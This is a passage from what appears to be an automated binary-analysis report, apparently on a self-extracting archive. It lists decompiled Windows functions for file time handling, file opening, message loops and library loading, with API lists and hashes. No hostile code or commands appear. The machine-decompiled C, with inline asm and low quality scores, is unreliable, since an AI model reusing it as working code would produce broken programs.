                            Download Yara Rule
                            C-Code - Quality: 65%
                            			E009F0910(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				intOrPtr _t47;
				long _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v48.wYear =  *_t66;
				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E009EA995() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16); // executed
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t61 = _v72.dwHighDateTime.dwLowDateTime;
						_t72 = _v72.dwLowDateTime;
					}
					 *_t76 = E009FDDC0(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t47 =  *((intOrPtr*)(_t66 + 0x18));
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}
















                            0x009f0910
                            0x009f0914
                            0x009f0923
                            0x009f0925
                            0x009f092e
                            0x009f0937
                            0x009f0940
                            0x009f0949
                            0x009f0952
                            0x009f0959
                            0x009f095e
                            0x009f0972
                            0x009f0a0e
                            0x009f0a10
                            0x009f0978
                            0x009f0984
                            0x009f09aa
                            0x009f09bb
                            0x009f09cb
                            0x009f09d7
                            0x009f09df
                            0x009f09e5
                            0x009f09ed
                            0x009f09f3
                            0x009f09f5
                            0x009f09f9
                            0x009f0986
                            0x009f0990
                            0x009f0996
                            0x009f099a
                            0x009f099a
                            0x009f0a05
                            0x009f0a07
                            0x009f0a07
                            0x009f0a13
                            0x009f0a16
                            0x009f0a18
                            0x009f0a22

                            APIs
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 009F096E
                              • Part of subcall function 009EA995: GetVersionExW.KERNEL32(?), ref: 009EA9BA
                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009F0990
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 009F09AA
                            • TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 009F09BB
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 009F09CB
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 009F09D7
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Time$File$System$Local$SpecificVersion
                            • String ID:
                            • API String ID: 2092733347-0
                            • Opcode ID: 368ebe5a534958491cbeb2cde044f2a44dc60465dbb9c17e5c9149a0d408b28f
                            • Instruction ID: b2ec4587418a71a746952701be2a16876c99038e65aee2117e0fecdecc71c026
                            • Opcode Fuzzy Hash: 368ebe5a534958491cbeb2cde044f2a44dc60465dbb9c17e5c9149a0d408b28f
                            • Instruction Fuzzy Hash: 4E31D57A1183469BC700DFA5C8849ABB7E8FFD8704F04491EFA99C3211E734D949CB6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9768, Relevance: 7.6, APIs: 5, Instructions: 116filetimeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E009E9768(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
				long _v0;
				void* _t48;
				long _t59;
				unsigned int _t61;
				long _t64;
				signed int _t65;
				char _t68;
				void* _t72;
				void* _t74;
				long _t78;
				void* _t81;

				_t74 = __esi;
				E009FD940();
				_t61 = _a4188;
				_t72 = __ecx;
				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
					_t68 = 1;
				} else {
					_t68 = 0;
				}
				_push(_t74);
				asm("sbb esi, esi");
				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
				if((_t61 & 0x00000001) != 0) {
					_t78 = _t78 | 0x40000000;
				}
				_t64 =  !(_t61 >> 3) & 0x00000001;
				if(_t68 != 0) {
					_t64 = _t64 | 0x00000002;
				}
				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
				E009E6EF9( &_a12);
				if( *((char*)(_t72 + 0x1c)) != 0) {
					_t78 = _t78 | 0x00000100;
				}
				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
				_t81 = _t48;
				if(_t81 != 0xffffffff) {
					L17:
					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
						_a8 = _a8 | 0xffffffff;
						SetFileTime(_t81, 0,  &_a4, 0);
					}
					 *((char*)(_t72 + 0x12)) = 0;
					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
					 *((intOrPtr*)(_t72 + 0xc)) = 0;
					 *((char*)(_t72 + 0x10)) = 0;
					if(_t81 != 0xffffffff) {
						 *(_t72 + 4) = _t81;
						E009EFAB1(_t72 + 0x1e, _a4184, 0x800);
					}
					return _t65;
				} else {
					_a4.dwLowDateTime = GetLastError();
					if(E009EB32C(_a4184,  &_a12, 0x800) == 0) {
						L15:
						if(_a4.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
						}
						goto L17;
					}
					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
					_t59 = GetLastError();
					if(_t59 == 2) {
						_a4.dwLowDateTime = _t59;
					}
					if(_t81 != 0xffffffff) {
						goto L17;
					} else {
						goto L15;
					}
				}
			}














                            0x009e9768
                            0x009e976d
                            0x009e9773
                            0x009e977c
                            0x009e977e
                            0x009e9789
                            0x009e9794
                            0x009e9790
                            0x009e9790
                            0x009e9790
                            0x009e979a
                            0x009e97a2
                            0x009e97aa
                            0x009e97b3
                            0x009e97b5
                            0x009e97b5
                            0x009e97c0
                            0x009e97c5
                            0x009e97c7
                            0x009e97c7
                            0x009e97dc
                            0x009e97e0
                            0x009e97e9
                            0x009e97eb
                            0x009e97eb
                            0x009e9804
                            0x009e980a
                            0x009e980f
                            0x009e9873
                            0x009e9878
                            0x009e987f
                            0x009e9888
                            0x009e9893
                            0x009e9893
                            0x009e989e
                            0x009e98a1
                            0x009e98a4
                            0x009e98a7
                            0x009e98ad
                            0x009e98be
                            0x009e98c2
                            0x009e98c2
                            0x009e98d2
                            0x009e9811
                            0x009e9817
                            0x009e9833
                            0x009e9862
                            0x009e9867
                            0x009e9869
                            0x009e9869
                            0x00000000
                            0x009e9867
                            0x009e984c
                            0x009e984e
                            0x009e9857
                            0x009e9859
                            0x009e9859
                            0x009e9860
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e9860

                            APIs
                            • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,009E76F2,?,00000005,?,00000011), ref: 009E9804
                            • GetLastError.KERNEL32(?,?,009E76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009E9811
                            • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,009E76F2,?,00000005,?), ref: 009E9846
                            • GetLastError.KERNEL32(?,?,009E76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009E984E
                            • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,009E76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009E9893
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: File$CreateErrorLast$Time
                            • String ID:
                            • API String ID: 1999340476-0
                            • Opcode ID: e5a45bdd2f6f2ef7bdf876ffd2c829c0e2d586cea8fa463ef9608a1cd7ba0dca
                            • Instruction ID: 07b736f477d3af8161475eecce3c22c72db2b15abab5091d8eccdaa5b584e975
                            • Opcode Fuzzy Hash: e5a45bdd2f6f2ef7bdf876ffd2c829c0e2d586cea8fa463ef9608a1cd7ba0dca
                            • Instruction Fuzzy Hash: EC4136318447866BE322DF65CC05BDABBE8FB46324F100719F9E4961E0D3B5AC99CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FA388, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009FA388() {
				struct tagMSG _v32;
				int _t7;
				struct HWND__* _t10;
				long _t14;

				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
				if(_t7 != 0) {
					GetMessageW( &_v32, 0, 0, 0);
					_t10 =  *0xa275c8; // 0x201b4
					if(_t10 == 0) {
						L3:
						TranslateMessage( &_v32);
						_t14 = DispatchMessageW( &_v32); // executed
						return _t14;
					}
					_t7 = IsDialogMessageW(_t10,  &_v32);
					if(_t7 == 0) {
						goto L3;
					}
				}
				return _t7;
			}







                            0x009fa399
                            0x009fa3a1
                            0x009fa3aa
                            0x009fa3b0
                            0x009fa3b7
                            0x009fa3c8
                            0x009fa3cc
                            0x009fa3d6
                            0x00000000
                            0x009fa3d6
                            0x009fa3be
                            0x009fa3c6
                            0x00000000
                            0x00000000
                            0x009fa3c6
                            0x009fa3e0

                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009FA399
                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009FA3AA
                            • IsDialogMessageW.USER32(000201B4,?), ref: 009FA3BE
                            • TranslateMessage.USER32(?), ref: 009FA3CC
                            • DispatchMessageW.USER32(?), ref: 009FA3D6
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Message$DialogDispatchPeekTranslate
                            • String ID:
                            • API String ID: 1266772231-0
                            • Opcode ID: 29c0836243b9c6cfc05d9fc7e175925f0ded7ca7888926af6a6c763bfb58bb10
                            • Instruction ID: f643f9a9ba05eaf35fde84bdf4549411053f70af3ab507a6be3f2aef19c981a7
                            • Opcode Fuzzy Hash: 29c0836243b9c6cfc05d9fc7e175925f0ded7ca7888926af6a6c763bfb58bb10
                            • Instruction Fuzzy Hash: BDF0BD7190122DABCB20EBE5AD4CDEF7F6CEE052517008515B50AD2010E768D607C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F9A32, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009F9A32(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E009F1410( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}








                            0x009f9a42
                            0x009f9a49
                            0x009f9a51
                            0x009f9a54
                            0x009f9a61
                            0x009f9a68
                            0x009f9a70
                            0x009f9a76
                            0x009f9a76
                            0x009f9a78
                            0x009f9a7b
                            0x009f9a80
                            0x00000000
                            0x009f9a80
                            0x009f9a8a

                            APIs
                            • GetClassNameW.USER32(?,?,00000050), ref: 009F9A49
                            • SHAutoComplete.SHLWAPI(?,00000010), ref: 009F9A80
                              • Part of subcall function 009F1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,009EACFE,?,?,?,009EACAD,?,-00000002,?,00000000,?), ref: 009F1426
                            • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 009F9A70
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AutoClassCompareCompleteFindNameStringWindow
                            • String ID: EDIT
                            • API String ID: 4243998846-3080729518
                            • Opcode ID: 844b00899d9500a1022acc1114b85c58bebff0bd6a37805b4e2ce073452e6ca3
                            • Instruction ID: 17bc2d2ee9dd8568bcae98041710763d098a409cc73cea46c2c4bae5f34c45f7
                            • Opcode Fuzzy Hash: 844b00899d9500a1022acc1114b85c58bebff0bd6a37805b4e2ce073452e6ca3
                            • Instruction Fuzzy Hash: 18F05E32A0122C76D6209AA59C05FFB766C9B86B51F44016ABE01A7180D6649A4286E6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F9AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                            Download Yara Rule
                            C-Code - Quality: 25%
                            			E009F9AA0(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t10;

				_t10 = E009EFCFD(L"riched20.dll"); // executed
				 *__ecx = _t10;
				 *0xa1dffc(0); // executed
				_v16 = 8;
				_v12 = 0x7ff;
				 *0xa1deb4( &_v16);
				_v32 = 1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				L009FD820(); // executed
				 *0xa1df08(0xa275c0,  &_v8,  &_v32, 0); // executed
				return __ecx;
			}











                            0x009f9aaf
                            0x009f9ab6
                            0x009f9ab9
                            0x009f9ac2
                            0x009f9aca
                            0x009f9ad1
                            0x009f9adb
                            0x009f9ae6
                            0x009f9aea
                            0x009f9aed
                            0x009f9af0
                            0x009f9afa
                            0x009f9b07

                            APIs
                              • Part of subcall function 009EFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009EFD18
                              • Part of subcall function 009EFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009EE7F6,Crypt32.dll,?,009EE878,?,009EE85C,?,?,?,?), ref: 009EFD3A
                            • OleInitialize.OLE32(00000000), ref: 009F9AB9
                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 009F9AF0
                            • SHGetMalloc.SHELL32(00A275C0), ref: 009F9AFA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                            • String ID: riched20.dll
                            • API String ID: 3498096277-3360196438
                            • Opcode ID: 643bfb5ee8779091c769e2b6a8a8a57f9d08f70801a4171ed9c2c0f475667216
                            • Instruction ID: 40952672691768afeb8f540ad92895237af0f32c1db75e894768fd71631b1f09
                            • Opcode Fuzzy Hash: 643bfb5ee8779091c769e2b6a8a8a57f9d08f70801a4171ed9c2c0f475667216
                            • Instruction Fuzzy Hash: D4F04FB1C0010DABCB10EF99D849AEEFBFCEF84301F10406AE814A2240DBB416068BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FC891, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                            Download Yara Rule
                            C-Code - Quality: 66%
                            			E009FC891(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E009FD940();
				SetEnvironmentVariableW(L"sfxcmd", _a4);
				_t7 = E009EF835(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E009EF94C() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
				}
				return _t7;
			}







                            0x009fc891
                            0x009fc899
                            0x009fc8a7
                            0x009fc8bc
                            0x009fc8c1
                            0x009fc8c5
                            0x009fc8ca
                            0x009fc8d4
                            0x009fc8cd
                            0x009fc8cd
                            0x009fc8d3
                            0x009fc8d3
                            0x009fc8e3
                            0x009fc8e3
                            0x009fc8ed

                            APIs
                            • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 009FC8A7
                            • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 009FC8E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: EnvironmentVariable
                            • String ID: sfxcmd$sfxpar
                            • API String ID: 1431749950-3493335439
                            • Opcode ID: 728a079003045bd418e7333fa0061370f81d25c73ba5912a62d8201f06028097
                            • Instruction ID: 81787d0bbace15d326b8aed2adee49d4a512de279efb62a55ab8e8461b3bc941
                            • Opcode Fuzzy Hash: 728a079003045bd418e7333fa0061370f81d25c73ba5912a62d8201f06028097
                            • Instruction Fuzzy Hash: ADF0A7B280122DB6DB21AFD19C09FFA776CAF05791B008556FE4996142DA608C91D7F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E964A, Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 59%
                            			E009E964A(void* __ecx, void* _a4, long _a8) {
				long _v8;
				int _t14;
				signed int _t15;
				void* _t25;

				_push(__ecx);
				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
				}
				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
				if(_t14 != 0) {
					_t15 = _v8;
				} else {
					_t16 = E009E9745(_t25);
					if(_t16 == 0) {
						L7:
						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
							L10:
							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
								L14:
								_t15 = _t16 | 0xffffffff;
							} else {
								_t16 = GetLastError();
								if(_t16 != 0x21) {
									goto L14;
								} else {
									_push(0x8000);
									goto L6;
								}
							}
						} else {
							_t16 = GetLastError();
							if(_t16 != 0x6d) {
								goto L10;
							} else {
								_t15 = 0;
							}
						}
					} else {
						_t16 = 0x4e20;
						if(_a8 <= 0x4e20) {
							goto L7;
						} else {
							_push(0x4e20);
							L6:
							_push(_a4);
							_t15 = E009E964A(_t25);
						}
					}
				}
				return _t15;
			}







                            0x009e964d
                            0x009e9650
                            0x009e9656
                            0x009e9660
                            0x009e9660
                            0x009e9672
                            0x009e967a
                            0x009e96d6
                            0x009e967c
                            0x009e967e
                            0x009e9685
                            0x009e969e
                            0x009e96a2
                            0x009e96b3
                            0x009e96b7
                            0x009e96d1
                            0x009e96d1
                            0x009e96c3
                            0x009e96c3
                            0x009e96cc
                            0x00000000
                            0x009e96ce
                            0x009e96ce
                            0x00000000
                            0x009e96ce
                            0x009e96cc
                            0x009e96a4
                            0x009e96a4
                            0x009e96ad
                            0x00000000
                            0x009e96af
                            0x009e96af
                            0x009e96af
                            0x009e96ad
                            0x009e9687
                            0x009e9687
                            0x009e968f
                            0x00000000
                            0x009e9691
                            0x009e9691
                            0x009e9692
                            0x009e9692
                            0x009e9697
                            0x009e9697
                            0x009e968f
                            0x009e9685
                            0x009e96de

                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 009E965A
                            • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 009E9672
                            • GetLastError.KERNEL32 ref: 009E96A4
                            • GetLastError.KERNEL32 ref: 009E96C3
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorLast$FileHandleRead
                            • String ID:
                            • API String ID: 2244327787-0
                            • Opcode ID: bde10159e95c6240b29bac1612e14ad90dd7e8e463cde6f11b3800fb230aed3d
                            • Instruction ID: 92c9349059264b48f9210784afe2836c85c5caad49235b441f8280c363fac9fb
                            • Opcode Fuzzy Hash: bde10159e95c6240b29bac1612e14ad90dd7e8e463cde6f11b3800fb230aed3d
                            • Instruction Fuzzy Hash: D611A530500298EFDF22AF56C944BA977ADFB04B61F10C62BF82685190EB75CD50DF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A09A2C, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E00A09A2C(signed int _a4) {
				signed int _t9;
				void* _t10;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0xa40768 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0xa15ba0 + _t9 * 4);
					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
					_t27 = _t10;
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xda86b1c9
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}











                            0x00a09a31
                            0x00a09a35
                            0x00a09a3c
                            0x00a09a40
                            0x00a09a4e
                            0x00a09a5e
                            0x00a09a64
                            0x00a09a68
                            0x00a09a91
                            0x00a09a93
                            0x00a09a97
                            0x00a09a9a
                            0x00a09a9a
                            0x00a09aa0
                            0x00a09aa2
                            0x00000000
                            0x00a09aa3
                            0x00a09a6a
                            0x00a09a73
                            0x00a09a82
                            0x00a09a75
                            0x00a09a78
                            0x00a09a7e
                            0x00a09a7e
                            0x00a09a86
                            0x00000000
                            0x00a09a88
                            0x00a09a8b
                            0x00a09a8d
                            0x00000000
                            0x00a09a8d
                            0x00a09a86
                            0x00a09a42
                            0x00a09a47
                            0x00000000

                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00A02E0F,00000000,00000000,?,00A099D3,00A02E0F,00000000,00000000,00000000,?,00A09BD0,00000006,FlsSetValue), ref: 00A09A5E
                            • GetLastError.KERNEL32(?,00A099D3,00A02E0F,00000000,00000000,00000000,?,00A09BD0,00000006,FlsSetValue,00A16058,00A16060,00000000,00000364,?,00A085E8), ref: 00A09A6A
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A099D3,00A02E0F,00000000,00000000,00000000,?,00A09BD0,00000006,FlsSetValue,00A16058,00A16060,00000000), ref: 00A09A78
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: 606f5763e3cecbbb8200096d915fe075f5122f605a4dcf150b6a577f2b86373f
                            • Instruction ID: bfc820fa2554bd61e5a765f256414dfb42b1c77f6a93621d1960bc80ad1d697b
                            • Opcode Fuzzy Hash: 606f5763e3cecbbb8200096d915fe075f5122f605a4dcf150b6a577f2b86373f
                            • Instruction Fuzzy Hash: 2E01D43674522BABC721CBA8BC44B977798AF497E07104620F906D31C2D731DC12C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E9C34, Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E009E9C34(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
				void* __ebp;
				int _t24;
				long _t32;
				void* _t36;
				void* _t42;
				void* _t52;
				intOrPtr* _t53;
				void* _t57;
				intOrPtr _t58;
				long _t59;

				_t52 = __edx;
				_t59 = _a8;
				_t53 = __ecx;
				if(_t59 != 0) {
					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
					}
					while(1) {
						_a8 = _a8 & 0x00000000;
						_t42 = 0;
						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
							goto L12;
						}
						_t57 = 0;
						if(_t59 == 0) {
							L14:
